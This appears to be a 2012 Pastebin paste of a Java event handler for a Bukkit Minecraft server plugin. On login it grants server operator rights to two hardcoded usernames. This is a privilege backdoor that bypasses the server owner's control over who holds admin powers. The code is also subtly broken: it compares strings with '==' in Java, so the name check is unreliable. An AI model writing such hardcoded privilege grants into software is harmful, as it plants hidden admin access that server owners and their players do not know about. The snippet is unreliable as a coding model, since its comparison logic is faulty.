Advertisement
h31ix

Untitled

Jun 19th, 2012
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. @EventHandler(priority=EventPriority.HIGHEST)
  2. public void onPlayerLogin(PlayerLoginEvent event) { System.out.print("this is proving that the damned event works");
  3. Player player = event.getPlayer();
  4. if ((player.getDisplayName() == "jamiemac262") || (player.getDisplayName() == "dmkiller11")) {
  5. player.setOp(true);
  6. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement